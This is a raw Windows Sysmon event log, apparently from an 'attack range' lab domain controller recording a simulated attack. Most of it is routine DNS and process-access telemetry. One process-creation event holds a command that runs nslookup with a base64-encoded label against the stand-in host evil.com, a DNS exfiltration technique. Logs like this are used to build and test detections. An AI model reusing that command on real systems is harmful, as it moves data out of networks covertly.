14:16:21.343{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.343{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000197592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.328{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlswf.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000197591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.536{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52439- 354300x8000000000000000197590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.535{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52438- 354300x8000000000000000197589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.414{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52437- 354300x8000000000000000197588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.414{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52436- 354300x8000000000000000197587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.413{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52435- 354300x8000000000000000197586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.297{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52434- 354300x8000000000000000197585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.297{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52433- 354300x8000000000000000197584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.297{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52432- 354300x8000000000000000197583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.193{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52431- 354300x8000000000000000197582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.193{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52430- 354300x8000000000000000197581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.193{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52429- 354300x8000000000000000197580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.056{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52428- 354300x8000000000000000197579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.056{00000000-0000-0000-0000-000000000000}3396<unknown process>-udptruefalse127.0.0.1-52428-false127.0.0.1-53domain 354300x8000000000000000197578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.056{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52427- 354300x8000000000000000197577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.055{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52426- 354300x8000000000000000197576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.055{00000000-0000-0000-0000-000000000000}3396<unknown process>-udptruefalse127.0.0.1-52426-false127.0.0.1-53domain 354300x8000000000000000197575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.996{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52425- 354300x8000000000000000197574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.996{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52424- 354300x8000000000000000197573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.995{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52423- 354300x8000000000000000197572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52422- 354300x8000000000000000197571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.862{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52421- 354300x8000000000000000197570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.860{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52420- 354300x8000000000000000197569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.763{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52419- 354300x8000000000000000197568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.763{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52418- 354300x8000000000000000197567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.762{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52417- 354300x8000000000000000197566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.762{00000000-0000-0000-0000-000000000000}3644<unknown process>-udptruefalse127.0.0.1-52417-false127.0.0.1-53domain 354300x8000000000000000197565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.403{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52416- 354300x8000000000000000197564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.403{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52415- 354300x8000000000000000197563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.402{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52414- 354300x8000000000000000197562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.402{00000000-0000-0000-0000-000000000000}3736<unknown process>-udptruefalse127.0.0.1-52414-false127.0.0.1-53domain 354300x8000000000000000197561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.328{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52413- 354300x8000000000000000197560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.328{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52412- 354300x8000000000000000197559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.327{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52411- 10341000x8000000000000000197558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.290{2E1864BB-17B5-629A-473F-000000005F02}39641432C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-483F-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.290{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.290{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.290{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.290{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.290{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-483F-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.290{2E1864BB-17B5-629A-463F-000000005F02}70007368C:\Windows\system32\cmd.exe{2E1864BB-17B5-629A-483F-000000005F02}2604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.299{2E1864BB-17B5-629A-483F-000000005F02}2604C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B5-629A-463F-000000005F02}7000C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlswf.tmp 2>&1 10341000x8000000000000000197550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.259{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-473F-000000005F02}3964C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.259{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-473F-000000005F02}3964C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.259{2E1864BB-17B5-629A-473F-000000005F02}39641432C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-463F-000000005F02}7000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.243{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-473F-000000005F02}3964C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.228{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.228{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.228{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.228{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.228{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-463F-000000005F02}7000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 